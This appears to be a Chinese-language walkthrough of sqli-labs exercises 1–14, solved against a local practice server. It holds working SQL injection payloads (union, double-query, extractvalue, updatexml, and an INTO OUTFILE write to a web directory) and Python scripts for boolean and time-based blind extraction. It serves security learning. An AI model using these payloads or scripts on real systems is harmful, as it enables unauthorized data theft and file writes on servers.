Less-1 GET - Error based - Single quotes - String
(基于错误的GET单引号字符型注入)
根据报错信息,推断为字符型注入
order by 3回显正常 order by 4报错 推断出column数为3
用group_concat可以把这个字段的值打印在一行
Less-2 GET - Error based - Intiger based
(基于错误的GET整型注入)
其中%2b为+的url编码
看到输入1+1的返回结果与输入2相同
判断为数字型注入
payload与Less-1相似 只需把引号去掉即可
Less-3 GET - Error based - Single quotes with twist string
(基于错误的GET单引号变形字符型注入)
输入1'报错 报错信息提示内容放到单引号加圆括号里
推测语句为select ... from ... where id=('1')
payload与Less-1相似 只需添加一个圆括号即可
Less-4 GET - Error based - Double Quotes - String
(基于错误的GET双引号字符型注入)
输入单引号不变 输入双引号报错
根据报错信息推测语句为select ... from ... where id=("")
把Less-1后面的单引号换成双引号加)即可
Less-5 GET - Double Injection - Single Quotes - String
(双注入GET单引号字符型注入)
输入1'报错
但是页面显示的结果一直为You are in...
可以采用布尔盲注 时间盲注 报错注入
这里采用布尔盲注爆破数据库为例
爆数据库长度
def getdb_num():
for i in range(1,20):
payload=f"' and length(database())={i} --+"
html=requests.get(url+payload).text
if('You are in' in html):
print(f"[+]数据库长度:{i}")
爆破数据库名
def getdb_name():
db_name=''
for i in range(1,db_num+1):
max=ord('z')
min=ord('A')
while abs(max-min)>1:
mid=(max+min)//2
payload=f"' and ascii(substr(database(),{i},1))>{mid} --+"
html=requests.get(url+payload).text
if('You are in' in html):
min=mid
else:
max=mid
db_name+=chr(max)
print(f"[+]数据库名:{db_name}")
return db_name
总代码
import requests
def getdb_num():
for i in range(1,20):
payload=f"' and length(database())={i} --+"
html=requests.get(url+payload).text
if('You are in' in html):
print(f"[+]数据库长度:{i}")
return i
def getdb_name():
db_name=''
for i in range(1,db_num+1):
max=ord('z')
min=ord('A')
while abs(max-min)>1:
mid=(max+min)//2
payload=f"' and ascii(substr(database(),{i},1))>{mid} --+"
html=requests.get(url+payload).text
if('You are in' in html):
min=mid
else:
max=mid
db_name+=chr(max)
print(f"[+]数据库名:{db_name}")
return db_name
if(__name__=="__main__"):
url='http://127.0.0.1/Less-5/?id=1'
db_num=getdb_num()
db_name=getdb_name()
通过看别人的博客学到了还可以用双查询注入
双查询注入
hid=-1' union select count(*),1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a --+
Less-6 GET - Double Injection - Double Quotes - String
(双注入GET双引号字符型注入)
将上一题的单引号换成双引号即可
Less-7 GET - Dump into outfile - String
(导出文件GET字符型注入)
经过尝试发现原语句应为select * from users where id=(('id'))
因此采用'))来闭合
题目提示dump into outfile
这里采用写入文件的方式
id=1')) union select 1,2,'helloword' into outfile "D:\\phpstudy_pro\\WWW\\test.txt" --+
Less-8 GET - Blind - Boolian Based - Single Quotes
(布尔型单引号GET盲注)
使用布尔盲注和时间盲注均可 与第五题思路类似
唯一不同点是不能用报错注入
Less-9 GET - Blind - Time based. - Single Quotes
(基于时间的GET单引号盲注)
不管输入什么
以下为爆出数据库名的python脚本
import requests
import time
url='http://127.0.0.1/Less-9/?id=1'
database=''
for i in range(1,9):
max=ord('z')
min=ord('a')
while abs(max-min)>1:
mid=(max+min)//2
payload=f"' and if(ascii(substr(database(),{i},1))>{mid},sleep(2),1) --+"
stime=time.time()
requests.get(url+payload)
etime=time.time()
if etime-stime>1:
min=mid
else:
max=mid
database+=chr(max)
print(database)
Less-11 POST - Error Based - Single quotes- String
(基于错误的POST型单引号字符型注入)
简单的post注入
Less-12 POST - Error Based - Double quotes- String-with twist
(基于错误的双引号POST型字符型变形的注入)
输入admin"时出现报错信息
可见查询语句应该为SELECT username, password FROM users WHERE username=(
与上题思路一样 把单引号换成")即可
Less-13 POST - Double Injection - Single quotes- String -twist
(POST单引号变形双注入)
输入username输入admin'报错
可知需使用')闭合
输入内容无回显,想到采用布尔盲注
发现当登录成功时会出现flag.jpg
以下为爆出数据库名的脚本
import requests
url='http://127.0.0.1/Less-13/'
database=''
for i in range(1,9):
max=ord('z')
min=ord('A')
while abs(max-min)>1:
mid=(max+min)//2
payload=f"admin ') and ascii(substr(database(),{i},1))>{mid} #"
data={
'uname':payload,
'passwd':"123"
}
html=requests.post(url=url,data=data).text
if("flag.jpg" in html):
min=mid
else:
max=mid
database+=chr(max)
print(database)
爆出第三张表(users表):
import requests
url='http://127.0.0.1/Less-13/'
table=''
for i in range(1,6):
max=ord('z')
min=ord('A')
while abs(max-min)>1:
mid=(max+min)//2
payload=f"admin ') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),{i},1))>{mid} #"
data={
'uname':payload,
'passwd':"123"
}
html=requests.post(url=url,data=data).text
if("flag.jpg" in html):
min=mid
else:
max=mid
table+=chr(max)
print(table)
Less-14 POST - Double Injection - Single quotes- String -twist
(POST单引号变形双注入)
输入admin"报错
可知使用"闭合
思路和上题一样 可以采用布尔盲注 也可以采用报错注入
这里采用报错注入
1.concat聚合函数报错注入
payload:
uname=123" union select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema =database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a#&passwd=123
2.extractvalue报错注入
payload:
uname=123" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) #&passwd=123
3.updatexml报错注入
payload:
uname=123" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=123
